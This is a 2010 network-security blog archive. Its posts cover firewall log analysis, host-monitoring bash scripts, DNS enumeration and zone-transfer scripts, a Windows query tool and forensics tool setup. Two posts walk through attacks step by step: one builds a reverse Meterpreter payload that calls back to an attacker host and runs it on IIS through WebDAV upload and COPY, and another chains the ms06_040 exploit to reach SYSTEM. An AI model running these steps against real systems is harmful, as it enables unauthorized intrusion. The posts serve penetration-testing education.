Thursday, November 4, 2010

Exporting Packet Captures - Multi-Context FWSMs

I came across an interesting scenario today that was worth sharing. I'm in charge of a multi-context Cisco FWSM (Firewall Services Module). Today, while troubleshooting an issue, I ran a packet capture to analyze the problem, which is normally one of the first things I do.

I realized I had done this capture on a context which did not have a management IP address (don't ask). Not having any way to directly route to the context meant that my usual method of downloading the capture in *.pcap format wouldn't work via a browser, so what to do?

After some searching around, I discovered that you could simply use TFTP through the FWSM's system context to obtain the file...problem solved!

FWSM# copy /pcap capture:examplecontext/in-cap tftp:

FWSM# copy /pcap capture:public/skid-capture.pcap tftp:
Source capture name [public/skid-capture]?
Address or name of remote host []? 1.1.1.1
Destination filename [skid-capture.pcap]?
!!!!!!
111 packets copied in 1.200 secs (111 bytes/sec)

Wednesday, November 3, 2010

Determining When Devices Hit the Wire

Often I will find myself needing to determine when a device comes back online. The reasons are numerous: it could be as simple as waiting for a device to complete a reboot, or it could be a pesky, malware-laden device that only pokes its head online for short durations each day. Back in the day, it would take a continuous ping running in the background to determine when the device came online, but who wants to babysit a ping? Also, if I wasn't at my computer at that particular moment, I might never be the wiser.

To tackle these scenarios, I thought it would be personally useful if there was an automated method of notification so that this process could all be done in the background for me, and I could continue whatever work I was doing without having to micro-manage a ping.

For me, an email notification seemed ideal, since Outlook's preview window could quickly break me away from whatever I was doing and let my investigation begin as soon as the device in question came back online. My first attempt used a simple ICMP echo request (type 8) to determine the device's status. When the device came back online, I used the Linux sendEmail program to email me a status update. The result was the short bash script that follows.

#!/bin/bash

# Prompt for the target and the SMTP credentials used by sendEmail
echo "Please enter the IP address or FQDN of the host you are interested in: "
read ipaddress

echo -e "\nPlease enter Exchange password (used for sendEmail purposes): "
read -s PASSWORD

# Ping once per loop iteration; on the first reply, send the email and stop
while :
do
    ping -c 1 "$ipaddress" > /dev/null
    if [ $? -eq 0 ]; then
        sendEmail -f (enter from address) -t (enter your email address) \
            -u "Commence the Investigation!!!" -m "Host $ipaddress is back online!" \
            -s (enter SMTP relay server):25 -xu (enter username) -xp "$PASSWORD" -o tls=no
        break
    fi
done



As you can see, nothing too special here. The script simply runs a ping in a loop, sending a single ICMP echo request (type 8) and waiting for an ICMP echo reply (type 0) to return. Now, there are a couple of glaring problems with this, most notably: what happens if the device in question doesn't respond to ICMP because, for example, it is behind a firewall? To overcome some of the limitations of using ICMP, I came up with a second script that calls the fantastic Nmap in order to customize the types of probes used to determine a device's online status.

#!/bin/bash

NMAP=/usr/bin/nmap
NMAPOPTIONSLINUX="-n -PN -sS -p22,25,53,80,110,143,443 -PA22,53,80,443"
NMAPOPTIONSWIN="-n -PN -sS -p135-139,445,1025 -PA135-139,445,1025"
NMAPOPTIONSCISCO="-n -PN -sS -p22,23,80,443"

function Linux {
    while :
    do
        $NMAP $NMAPOPTIONSLINUX "$IPADDYLINUX" > nmap.txt
        grep -q "Host is up" nmap.txt
        if [ $? -eq 0 ]; then
            sendEmail -f (from email address) -t (to email address) -u "Commence the Investigation!!!" -m "Host $IPADDYLINUX is back online!" -s (SMTP relay server) -o tls=no
            break
        fi
    done
}

function Windows {
    while :
    do
        $NMAP $NMAPOPTIONSWIN "$IPADDYWIN" > nmap.txt
        grep -q "Host is up" nmap.txt
        if [ $? -eq 0 ]; then
            sendEmail -f (from email address) -t (to email address) -u "Commence the Investigation!!!" -m "Host $IPADDYWIN is back online!" -s (SMTP relay server) -o tls=no
            break
        fi
    done
}

function Cisco {
    while :
    do
        $NMAP $NMAPOPTIONSCISCO "$IPADDYCISCO" > nmap.txt
        grep -q "Host is up" nmap.txt
        if [ $? -eq 0 ]; then
            sendEmail -f (from email address) -t (to email address) -u "Commence the Investigation!!!" -m "Host $IPADDYCISCO is back online!" -s (SMTP relay server) -o tls=no
            break
        fi
    done
}

function Menu {
    clear
    cat <<DELIM

========================================================
Please Select the Appropriate Device Type
[L]inux or Unix
[W]indows
[C]isco
[Q]uit
========================================================

DELIM

    read DEVICETYPE
    clear

    shopt -s nocasematch
    if [[ $DEVICETYPE = *L* ]]; then
        echo "Please input IP address of Linux/Unix device:"
        read IPADDYLINUX
        echo -e "\nThank You, An Email Will Be Sent When Host is Back Online...\n"
        Linux
    elif [[ $DEVICETYPE = *W* ]]; then
        echo "Please input IP address of Windows device:"
        read IPADDYWIN
        echo -e "\nThank You, An Email Will Be Sent When Host is Back Online...\n"
        Windows
    elif [[ $DEVICETYPE = *C* ]]; then
        echo "Please input IP address of Cisco device:"
        read IPADDYCISCO
        echo -e "\nThank You, An Email Will Be Sent When Host is Back Online...\n"
        Cisco
    elif [[ $DEVICETYPE = *Q* ]]; then
        echo -e "\n\nGoodbye, and thank you for being the Network Police!"
        exit 0
    else
        echo "Sorry, --> $DEVICETYPE <-- is an Unknown Selection"
        echo "Press Enter to Continue..."
        read
        Menu
    fi
    shopt -u nocasematch
}

Menu



Besides a more polished look, this version actually tailors the TCP probes to the type of device in question. I customized the Nmap options based on personal experience with the various operating systems. As with the ICMP script, it waits for a device to come back online before notifying via email. Both of these bash scripts were written on the BackTrack 4 distro. Note that I did not require authentication on the SMTP relay server in the latter script.

Thursday, July 29, 2010

Manipulating Cisco Firewall Syslogs Using Linux Command Line

Recently, I've been doing a lot of firewall log auditing for various reasons. My Cisco firewalls send their logs to a centralized syslog server, which gzips them once an hour so the file sizes don't get out of control.

I'm doing my analysis on a Linux box (BT4 distro) with limited disk space and many of the commands I like to use aren't installed on the syslog server. With these obstacles in place, here is how I've been dealing with the Gigs of syslog messages to get what I really want.

The first step was simply to grab 24 hours' worth of log messages, which was as easy as FTP'ing into the syslog server and performing an "mget" on the date I desired. Now I have a lot of gzipped syslog files waiting for me to play with.

root@bt# ls -la
total 2915188
drwxr-xr-x 2 root root 4096 2010-07-28 14:01 .
drwxr-xr-x 48 root root 4096 2010-07-22 16:18 ..
-rw-r--r-- 1 root root 62478364 2010-07-27 15:25 fwsm.log.20100726.0000.gz
-rw-r--r-- 1 root root 64624441 2010-07-27 15:25 fwsm.log.20100726.0100.gz
-rw-r--r-- 1 root root 58798851 2010-07-27 15:25 fwsm.log.20100726.0200.gz
-rw-r--r-- 1 root root 57448529 2010-07-27 15:25 fwsm.log.20100726.0300.gz
-rw-r--r-- 1 root root 57916715 2010-07-27 15:25 fwsm.log.20100726.0400.gz
-rw-r--r-- 1 root root 58860324 2010-07-27 15:26 fwsm.log.20100726.0500.gz
-rw-r--r-- 1 root root 68676596 2010-07-27 15:26 fwsm.log.20100726.0600.gz
-rw-r--r-- 1 root root 78945716 2010-07-27 15:26 fwsm.log.20100726.0700.gz
-rw-r--r-- 1 root root 112321501 2010-07-27 15:26 fwsm.log.20100726.0800.gz
-rw-r--r-- 1 root root 169440875 2010-07-27 15:27 fwsm.log.20100726.0900.gz
-rw-r--r-- 1 root root 209838484 2010-07-27 15:27 fwsm.log.20100726.1000.gz
-rw-r--r-- 1 root root 227651887 2010-07-27 15:27 fwsm.log.20100726.1100.gz
-rw-r--r-- 1 root root 233153646 2010-07-27 15:28 fwsm.log.20100726.1200.gz
-rw-r--r-- 1 root root 244517081 2010-07-27 15:29 fwsm.log.20100726.1300.gz
(/snip)


Since I don't necessarily want to uncompress all the files just to inspect their contents, I'm going to use the nifty "zcat" command, which does the same thing as "cat" but on a gzip-compressed file. Here is what the syslog format looks like on a Cisco firewall with no field manipulation.

root@bt# zcat fwsm.log.20100726.0000.gz | more
Jul 25 23:00:00 firewall main %FWSM-6-302013: Built outbound TCP connection 146767145916591362 for inside:1.1.1.1/2359 (1.1.1.1/31921) to outside:66.166.52.133/80 (66.166.52.133/80)


As you can see here, it is simply an outbound web session initiated from one of my internal hosts (IP changed to protect the innocent) destined for a web server on Covad's IP block. In this particular adventure, I'm trending for any outbound telnet sessions leaving the boundary of my network. Obviously, telnet is not a preferred transport mechanism, and that goes double when leaving the internal network and crossing the Internet. Telnet is not encrypted, so anyone snooping on the network can see the contents being transferred, including usernames, passwords, etc. The first thing I want to do is find a sample telnet session, although the format will be identical to the syslog message above. My syntax includes "Built outbound" since I don't want to see all the deny messages... also, don't forget the space character after the /23. If you forget to include it, you'll match a lot of port numbers that merely start with "23", such as 2300, 23000, etc.
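To see why that trailing space matters, here is a tiny self-contained demonstration using fake log fragments (not real log data):

```shell
# two fake log fragments: a real telnet port and a lookalike
printf '%s\n' \
  'to outside:1.2.3.4/23 (1.2.3.4/23)' \
  'to outside:1.2.3.4/2300 (1.2.3.4/2300)' > sample.txt

grep -c "/23" sample.txt    # 2 -- matches the /2300 line too
grep -c "/23 " sample.txt   # 1 -- only the true telnet session
```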

root@bt# zcat fwsm.log.20100726.0000.gz | grep "Built outbound TCP" | grep "/23 " |more
Jul 25 23:06:17 firewall.example.com main %FWSM-6-302013: Built outbound TCP connection 146569495816626096 for inside:1.1.1.1/1366 (1.1.1.1/1366) to outside:166.111.30.174/23 (166.111.30.174/23)
Jul 25 23:30:55 firewall.example.com main %FWSM-6-302015: Built outbound TCP connection 146634027700247405 for inside:1.1.1.2/35886 (1.1.1.1/25685) to outside:91.213.175.139/23 (91.213.175.139/23)


Great, that worked like a champ, as we can see in the example above. At this point it's worth noting that there are multiple ways to skin this cat. We can combine search terms using grep, or simply use the more powerful sed/awk combination. For the purposes of this example, I'm trying to keep things simple, so many of the syntax examples could be shortened and sped up. Perhaps that can be an exercise for a later time...
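For the curious, here is a sketch of one such shortened form: a single awk pass that pulls the unique source IPs of built outbound telnet sessions (same log format as the samples above):

```shell
# one pass: filter built outbound telnet sessions, strip everything
# up to "inside:" and everything from the first "/", leaving the
# source IP, then de-duplicate
zcat fwsm.log* \
  | awk '/Built outbound TCP/ && /\/23 / {
      sub(/.*inside:/, ""); sub(/\/.*/, ""); print
    }' \
  | sort -u
```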

With my sample telnet violator message format handy, I am now interested in finding any source address participating in a telnet session from within my network. We'll also want to know who they talk to, but we'll get to that in a moment. Here is how I manipulated the data fields to accomplish what I wanted. I simply used the built-in Linux "cut" command to clean up the syslog format and then followed that with the "sort" and "uniq" combination. This left me with exactly what I wanted. Before moving on, I save all these addresses into an Excel document so I can come back to them later. This could also be done a little quicker by first writing your data into a separate text file before manipulation but, as mentioned earlier, I'm limited on disk space (and will be creating a file in a minute), so this was a fine compromise.

root@bt# zcat fwsm.log* | grep "Built outbound TCP" | grep "/23 " | cut -f5 -d ":" | cut -f1 -d "/" | sort | uniq
1.1.1.1
1.1.1.2
1.1.1.3
1.1.1.4
(/snip)


Okay, for the next phase, I want a text file containing all syslog messages related to built telnet sessions. I will be using this text file when I examine destination addresses connected to from the list of source addresses in my Excel document. To do this is rather easy, and covered earlier...the only difference is we'll be redirecting the output into a file instead of to the screen buffer.

root@bt# zcat fwsm.log* | grep "Built outbound TCP" | grep "/23 " > telnet-list.txt
root@bt# ls -la | grep "telnet"
-rw-r--r-- 1 root root 8785 2010-07-29 12:32 telnet-list.txt


In order to find the destination addresses for my source IPs, I wrote a little bash script. I call the script "telnet-lookup.sh" and it looks like this.

root@bt# nano telnet-lookup.sh
#!/bin/bash
# print unique destination addresses contacted by the source IP given as $1
grep "inside:$1/" telnet-list.txt | cut -f6 -d ":" | cut -f1 -d "/" | sort | uniq

root@bt# chmod 755 telnet-lookup.sh
root@bt# ./telnet-lookup.sh 1.1.1.1
74.22.17.99
98.136.48.48
147.55.32.107


Simply repeat this on all source IPs and you now have a working matrix you can use to continue investigating why these flows are occurring...
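That repetition can itself be scripted. Here is a sketch of a loop over the saved source list, assuming a hypothetical sources.txt holding one address per line, and the interface name "inside" as seen in the logs above:

```shell
# for each source address, print its unique telnet destinations;
# anchoring on "inside:$ip/" keeps 1.1.1.1 from matching 1.1.1.10
while read -r ip; do
  echo "== $ip =="
  grep "inside:$ip/" telnet-list.txt \
    | cut -f6 -d ":" | cut -f1 -d "/" | sort | uniq
done < sources.txt
```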

Thursday, June 3, 2010

Using Chained Exploits - Metasploit and Meterpreter

There are certain situations where a successful exploit leaves us a shell, but that shell does not have SYSTEM/root-level privileges. As an example, I've obtained a Windows Meterpreter (reverse TCP) shell using a WebDAV exploit, as explained elsewhere on this blog. This session has the rights of the web daemon, which are not enough to do most of the fun stuff.


meterpreter > getuid
Server username: USER\IWAM_USER
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: 87


After exhausting most of the local privilege escalation techniques I could think of (both using Meterpreter's built-in capabilities and uploading executable code to my target), I decided upon another approach. What if I could chain a second exploit and piggyback it off of my existing Meterpreter session? Fortunately, the developers of Metasploit implemented a neat feature that allows me to do this very thing.

The route command can be configured to route all traffic through an existing Meterpreter session. As you can see, the following steps led me from frustration to GAME OVER. In this example, it was Meterpreter session four (which is the last argument in the route add syntax).

msf exploit(handler) > route add 127.0.0.1 255.255.255.255 4
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
127.0.0.1 255.255.255.255 Session 4

msf exploit(handler) > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 127.0.0.1
msf exploit(ms06_040_netapi) > exploit

[*] Started reverse handler on 192.168.1.2:13337
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:127.0.0.1[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:127.0.0.1[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Sending stage (748032 bytes) to 192.168.1.3
[*] Meterpreter session 8 opened (192.168.1.2:13337 -> 192.168.1.3:4855) at Thu Jun 03 16:48:41 -0400 2010

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Tuesday, May 11, 2010

Hacking IIS via WebDAV

Often, as pentesters, we will run into web servers running WebDAV. WebDAV is convenient for developers, as it allows them to remotely edit and manage files on web servers. The same features that make it helpful for developers can also leave a server vulnerable to compromise. In this example, I've run across an IIS box running a very old version, as reported by my Nmap scan.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.1
Just to verify the results, I'll use Netcat to grab the banners off the box. It also verifies what Nmap reported.
#nc 1.1.1.1 80 -vv
(UNKNOWN) [1.1.1.1] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1

sent 17, rcvd 276
Once we are reasonably confident in our findings, let's scan for WebDAV. Essentially we want to know if it is present and what capabilities are active.

I use Metasploit and its built-in scanning modules for most of my follow-up steps. There are a few auxiliary modules that work brilliantly.
msf > use scanner/http/webdav_website_content
msf auxiliary(webdav_website_content) > set RHOSTS 1.1.1.1
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (1.1.1.1) http://1.1.1.1/scripts/

msf auxiliary(webdav_website_content) > use scanner/http/webdav_test
msf auxiliary(webdav_test) > set RHOSTS 1.1.1.1
msf auxiliary(webdav_test) > set PATH /scripts
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) has unknown ENABLED
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) Allows Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) Has Public Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
[*] Attempting to create /scriptsWebDavTest_4OpejeyCdj
[*] 192.168.13.203/scripts is WRITEABLE
[*] Checking extensions for upload and execution
[*] Prohibited file types ASP, EXE
Considering that the server is filtering certain file extensions, we'll need to upload our payload using something safe; in this example I'll use .txt. Before we upload, we first need to create the payload, so I'll set up a reverse Meterpreter payload for Windows using port 1337. Here is how you create the payload using the built-in Metasploit tools msfpayload and msfencode.

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=2.2.2.2 LPORT=1337 R | ./msfencode -o evilpayload.asp
Now, since we can't upload .asp files directly to the web server, we'll get a little tricky. Earlier, our WebDAV scans indicated we were able to execute the COPY command, and this is where we'll use it. Before we move on to that, let's get our listener ready.
./msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 2.2.2.2
set LPORT 1337
exploit
To make uploading the file easy, I found a neat tool named davtest which makes the heavy lifting very manageable. The program can be found here. The following syntax takes our Meterpreter payload and uploads it to the server with a .txt file extension.
./davtest.pl -url http://1.1.1.1/scripts/ -uploadfile /root/evilpayload.asp -uploadloc evilpayload.asp.txt
Browse to the server's script directory to ensure you see the new .txt file. The last major hurdle to tackle is renaming our file. Here is where we take advantage of the WebDAV COPY function. Netcat into the server and execute the following code.
nc 1.1.1.1 80 -vv
COPY /scripts/evilpayload.asp.txt HTTP/1.1
Host: 1.1.1.1
Destination: http://1.1.1.1/scripts/evilpayload.asp
Overwrite: T
Assuming this was successful, simply browse to the newly created evilpayload.asp file and a Meterpreter shell will be returned in your multi/handler session. In most cases, the limitation will be on local privileges (determined by the privilege level IIS runs under).

Friday, May 7, 2010

Installing CeWL in BT4

A great way to build custom password lists to feed into password crackers is by profiling the target’s websites using CeWL. More information on CeWL can be found here: CeWL - DigiNinja

Getting CeWL installed on BT4 takes a little bit of work. Since I just got done doing this very thing, I figured I'd share the steps needed to do the trick. The first thing to do is download the latest version of RubyGems (BT4 comes with 1.2.0, I believe).

wget http://rubyforge.org/frs/download.ph...gems-1.3.6.tgz
tar -xvf rubygems-1.3.6.tgz
rm rubygems-1.3.6.tgz
cd rubygems-1.3.6/
ruby setup.rb
gem -v (verifying the version is 1.3.6)

Once this is complete, download the latest version of CeWL from the project's website.

cd /pentest/passwords
wget digininja.org/files/cewl_3.0.tar.bz2
tar -xvjf cewl_3.0.tar.bz2
rm cewl_3.0.tar.bz2
cd cewl

Now there are some dependencies needed to run the program.

apt-get install libxml2-dev libxslt-dev libimage-exiftool-perl
gem install mime-types archive-tar-minitar nokogiri echoe hoe rcov zip rubyzip mini_exiftool http_configuration spider hpricot
export RUBYOPT=rubygems

Once we’re at this point, test it out and make sure it is functional.

./cewl.rb -d 2 -v VICTIM_URL

Assuming it works you can now begin creating custom password lists based on our target of choice.

Monday, March 29, 2010

Bash Script - DNS Enumeration

Part of any good reconnaissance work is enumerating your target. Normally you look for the "low hanging fruit" and what information is readily available to you.

I like to use DNS as an ally since the information is freely available and, if done correctly, it is relatively quiet.

I've written a couple of small bash scripts to automate the process of collecting this information, which can be a handful if done manually.

The first thing required is a text file called 'dns.txt' which will store a list of well known host names. This file will be called by the script when it attempts to enumerate available hosts. Entries in this file will include expected values for publicly available hosts. Listed below are my values, but your mileage may vary.

www
www1
www2
web
dns
dns1
dns2
ns
ns1
ns2
ns3
mail
mailhost
smtp
outlook
imap
pop
webmail
vpn
extranet
portal
proxy
secure
cisco
router
gateway
fw
fwsm
firewall
ftp
tftp
news
blog
test
honeypot
backup
linux
oracle
unix
search
forum



In the same directory, create a new file named DNSGrab.sh and give it executable rights if desired: "chmod 755 DNSGrab.sh"

#!/bin/bash
echo -e "\nThis script will allow you to look for publicly available hosts"
echo "You can perform a query either by selecting a target domain or /24 network"
echo "Would you like to [domain] scan or [subnet] enumerate?"
read answer
if [ "$answer" = "domain" ]; then
    echo "What domain would you like to scan?:"
    echo "example 'domain.com'"
    read domain
    echo -e "\n"
    # try resolving each well-known name from dns.txt under the domain
    for name in $(cat dns.txt); do
        host "$name.$domain" | grep "has address"
    done
elif [ "$answer" = "subnet" ]; then
    echo "Please enter Class C Subnet which you'd like to enumerate:"
    echo -e "example 192.168.20\n"
    read subnet
    # reverse-lookup every host on the given /24
    for octet in $(seq 1 254); do
        host "$subnet.$octet" | grep "name pointer" | cut -d" " -f1,5
    done
else
    echo -e "\nExpected 'domain' or 'subnet' as input, script exiting..."
fi




This script will simply do one of two things based on the user's input of "domain" or "subnet". If "domain" is chosen, it will quickly scour DNS looking for any hosts matching those in the dns.txt file. For example, if you chose google.com, it would try resolving ns.google.com, ns1.google.com, and on down the line. This can be great for spotting discontiguous subnets and discovering information about network topologies, etc.

If "subnet" is chosen then it will do a lookup of all hosts on a given /24. Examples of each are listed below:

# ./DNSGrab.sh

This script will allow you to look for publicly available hosts
You can perform a query either by selecting a target domain or /24 network
Would you like to [domain] scan or [subnet] enumerate?
domain
What domain would you like to scan?:
example 'domain.com'
hp.com


www.hpgtm.nsatc.net has address 15.201.49.22
www.hpgtm.nsatc.net has address 15.216.110.22
ns1.hp.com has address 15.219.145.12
ns2.hp.com has address 15.219.160.12
ns3.hp.com has address 15.203.209.12
mail.hp.com has address 15.192.0.152
smtp.hp.com has address 15.201.24.91
webmail.hp.com has address 16.230.34.78
extranet.hp.com has address 16.110.176.200
extranet.hp.com has address 16.228.52.17
extranet.hp.com has address 16.230.58.17
extranet.hp.com has address 16.234.58.17
extranet.hp.com has address 16.236.203.17
extranet.hp.com has address 16.238.58.17
portal.hp.com has address 16.232.36.204
ftp.hpgtm.nsatc.net has address 15.192.45.27
ftp.hpgtm.nsatc.net has address 15.216.110.132
usenet01.boi.hp.com has address 15.8.40.106
portal.hp.com has address 16.232.36.204
usenet01.boi.hp.com has address 15.8.40.106
linux.hp.com has address 192.6.234.9
linux.hp.com has address 192.151.53.86
oracle.hardingmarketing.com has address 66.35.221.168
www.hpgtm.nsatc.net has address 15.216.110.22
www.hpgtm.nsatc.net has address 15.201.49.22
search.hpgtm.nsatc.net has address 15.192.0.84



# ./DNSGrab.sh

This script will allow you to look for publicly available hosts
You can perform a query either by selecting a target domain or /24 network
Would you like to [domain] scan or [subnet] enumerate?
subnet
Please enter Class C Subnet which you'd like to enumerate:
example 192.168.20

16.232.36
1.36.232.16.in-addr.arpa vip-iba-16-236-36-0-gw.houston.hp.com.
2.36.232.16.in-addr.arpa cce01gwdc509-vlan265.houston.hp.com.
3.36.232.16.in-addr.arpa cce01gwdc510-vlan265.houston.hp.com.
4.36.232.16.in-addr.arpa cce01swdclb511-265.houston.hp.com.
5.36.232.16.in-addr.arpa cce01swdclb512-265.houston.hp.com.
6.36.232.16.in-addr.arpa cce01swdclb511-265-alias.houston.hp.com.
7.36.232.16.in-addr.arpa vip2-g3w1945c.houston.hp.com.
8.36.232.16.in-addr.arpa vappnestpro3.houston.hp.com.
9.36.232.16.in-addr.arpa gvu3727.houston.hp.com.
10.36.232.16.in-addr.arpa oispro-llb3.houston.hp.com.
11.36.232.16.in-addr.arpa gvu4394.houston.hp.com.
12.36.232.16.in-addr.arpa gvu4395.houston.hp.com.
13.36.232.16.in-addr.arpa gvu4442.houston.hp.com.
16.36.232.16.in-addr.arpa cce01-c509-nat265.houston.hp.com.
21.36.232.16.in-addr.arpa g3w0266.houston.hp.com.
(/snip)



If you want to test out the configuration of the DNS servers on a given domain, I've written an automated method to do that too. Follow the same steps as above and call this file "ZTransfer.sh". Here is the script:

#!/bin/bash

echo "Please enter domain:"
read domain

# attempt a zone transfer against every authoritative nameserver,
# appending any results to a single file (">" here would overwrite
# results from earlier nameservers on each pass)
> "$domain.txt"
for ns in $(host -t ns "$domain" | cut -d" " -f4); do
    host -l "$domain" "$ns" | grep "has address" >> "$domain.txt"
done
if [ ! -s "$domain.txt" ]; then
    echo "Zone Transfer Failed!"
    rm "$domain.txt"
else
    echo "Zone Transfer Completed Successfully!"
fi



Simply put, this will attempt a zone transfer on a user-supplied domain name. It goes without saying that you shouldn't do this unless you have permission. It is appropriate for pentesters and DNS admins looking to test the security of their configurations.

These were written and tested on a BT4 distro, feel free to modify as needed...

Friday, February 26, 2010

First Python Script - Simple Windows Query Tool

Decided to take up Python based on rave reviews from all the programmers I work with. For my first go at it, I wrote a simple little program that remotely grabs information off of Windows machines as part of investigations. It was written in Python 3.x, so I can't guarantee compatibility with Python 2.x.

The program makes calls to the PSTools suite as well as Nmap, so make sure that both are installed and listed in your PATH environment variable.

When run, the program will scan the remote target using Nmap looking for well known Windows ports. If it sees the remote workstation online, it will continue to grab a wealth of information from the target and store that information into individual text files.

"""
HostQuery.py
Author: Skid Rock 02.26.2010
Target Users: Individuals Conducting Windows Machine Investigations
Target System: Remote Windows Workstations
Syntax: HostQuery.py <enter>
"""

version = 0.1

import sys,os,string,time

machine = input('\nPlease Enter Workstation IP Address:')
os.system("nmap -sS " + machine + " -p 135,139,445 > scan.txt")

for line in open("scan.txt"):
if "Host is up" in line:
print ("\nHost " + machine + " appears to be online, grabbing information...\n")
os.system("psinfo -sc \\\\" + machine + " >" + machine + ".info.txt")
os.system("pslist \\\\" + machine + " >" + machine + ".list.txt")
os.system("psloggedon \\\\" + machine + " >" + machine + ".loggedon.txt")
os.system("psfile \\\\" + machine + " >" + machine + ".file.txt")
os.system("psloglist \\\\" + machine + " -d 7 -s Security >" + machine + ".eventlog.txt")
os.system("psexec \\\\" + machine + " netstat -bnv >" + machine + ".netstat.txt")
print ("\n\nCommand Completed Successfully...\n")
exit
else:
if "Host seems down." in line:
print ("\n\nHost " + machine + " appears down, or is not a Windows based OS, exiting...\n")
exit

Wednesday, February 24, 2010

Xplico - Network Forensics



Finally had a chance to play with Xplico, recently updated to version 0.5.5. For those not familiar with Xplico, please visit the development page here.
In short, Xplico is an open source tool designed to aid in dissecting large network captures in .pcap format. It can also do live captures and report on sessions as they get discovered. Installing Xplico is not trivial and required some trial and error on my part, so here are the Cliffs Notes based on an Ubuntu 9.10 installation.
apt-get install tcpdump tshark apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite3-dev php5-cli libapache2-mod-php5 libx11-dev libxt-dev libxaw7-dev python-all sqlite3 recode libmysqlclient15-dev

cd /tmp
mkdir xplico_install
cd xplico_install
wget http://sourceforge.net/projects/xplico/files/Xplico%20versions/version%200.5.5/xplico-0.5.5.tgz/download
tar zxvf xplico-0.5.5.tgz
wget http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.6.tar.gz
tar zxvf GeoIP-1.4.6.tar.gz
cd GeoIP-1.4.6
./configure
make
cd ..
rm -f GeoIP-1.4.6.tar.gz
cd xplico-0.5.5
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gzip -d GeoLiteCity.dat.gz
rm -f GeoLiteCity.dat.gz
make
cd ..
wget http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-8.70.tar.bz2
tar jxvf ghostpdl-8.70.tar.bz2
rm -f ghostpdl-8.70.tar.bz2
cd ghostpdl-8.70
make (this will take some time so go get coffee or something)
cd ..
cp ghostpdl-8.70/main/obj/pcl6 xplico-0.5.5
rm -rf ghostpdl-8.70
cd xplico-0.5.5
make install
cp /opt/xplico/cfg/apache_xi /etc/apache2/sites-enabled/xplico

- Edit /etc/apache2/ports.conf by adding the following:
# xplico Host port
NameVirtualHost *:9876
Listen 9876

- You will also have to edit the php.ini file located at /etc/php5/apache2/php.ini. Find and modify both of these lines:
post_max_size = 200M
upload_max_filesize = 100M

a2enmod rewrite
/etc/init.d/apache2 restart


Once you get this laundry list complete, simply fire up Firefox and browse to http://127.0.0.1:9876 (if on the local box) or http://(ip address):9876 if accessing remotely. Version 0.5.5 has a default username/password combination of xplico/xplico.

The first thing you'll want to do after logging in is create a new case. Xplico uses cases at the top level and sessions at the bottom level for all investigations. The screenshot below shows a session named example with multiple .pcap files uploaded and decoded by Xplico.


Navigating around the interface is fairly self explanatory but I've found it does a great job with decoding specific high level applications such as HTTP and FTP. Others may find value in its ability to decode Facebook chat and various types of email.

To reconstruct HTTP sessions, set Firefox's proxy settings to Xplico (below is a screenshot assuming Xplico is being run on localhost).




Click on the Web menu item and select what you want to view. In this case, I am looking at HTML. Select the HTTP conversation you want to inspect and click on the URL recorded by Xplico. It will reconstruct the HTTP session and display the session in a new window.

Future posts will go into more depth on Xplico as I have an opportunity to use it in real-world investigations. Kudos to the Xplico development team on a very promising tool...

Monday, February 22, 2010

Beginner's Setup Guide - Scrutinizer Netflow Analyzer

Scrutinizer is a Netflow repository tool created by Plixer. It provides a very intuitive GUI front-end that allows network administrators to quickly use collected Netflow data for auditing, troubleshooting, and reporting purposes.

There are two versions of Scrutinizer, both a free and paid version. Note that the free version dumps the database every day at midnight so you are limited in long term analysis capabilities.

The following text assumes that you have a working knowledge of NetFlow.

Scrutinizer “listens”; it does not poll network devices. This keeps configuration simple, and the setup follows a common pattern on Cisco devices. Listed below are very basic commands used to enable NetFlow export on a Cisco 6500. Some of these commands are unique to the 6500 platform and will not be required on an ISR router, for example; the platform-specific ones are the mls lines and the layer2-switched line.

ip flow-export source Loopback0
ip flow-export version 5
ip flow-export destination 192.168.1.1 9996
ip flow ingress layer2-switched vlan 10-11
ip flow-cache timeout active 1
ip flow-cache timeout inactive 15
mls nde sender version 5
mls aging long 64
mls aging normal 64
interface Vlan10
ip route-cache flow
interface Vlan11
ip route-cache flow
access-list 10 remark SNMP-access-list RO
access-list 10 permit 192.168.1.1
snmp-server community snmpread RO 10
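After applying the export configuration, it's worth confirming from the router side that flows are actually being cached and exported. These are standard IOS show commands (the mls variant again being 6500-specific); exact output varies by platform and software version.

```
show ip flow export        ! export destination, version, and datagram counters
show ip cache flow         ! current contents of the flow cache
show mls nde               ! NetFlow Data Export status on the 6500
```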

Further information on setting up Netflow can be found here and here.


Setting up your Scrutinizer installation to be accessible remotely is as simple as finding the configuration file located at "*\scrutinizer\apache2\conf\httpd.conf" and replacing "ServerName localhost:8080" with something of your liking, such as "ServerName .domain.com:8080". Once completed, you can log in via a web browser (just remember to include port 8080 after the URL).
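As a sketch of that one-line change, scripted with sed. This runs against a scratch copy; the real file sits under Scrutinizer's apache2\conf directory, and the hostname below is purely hypothetical.

```shell
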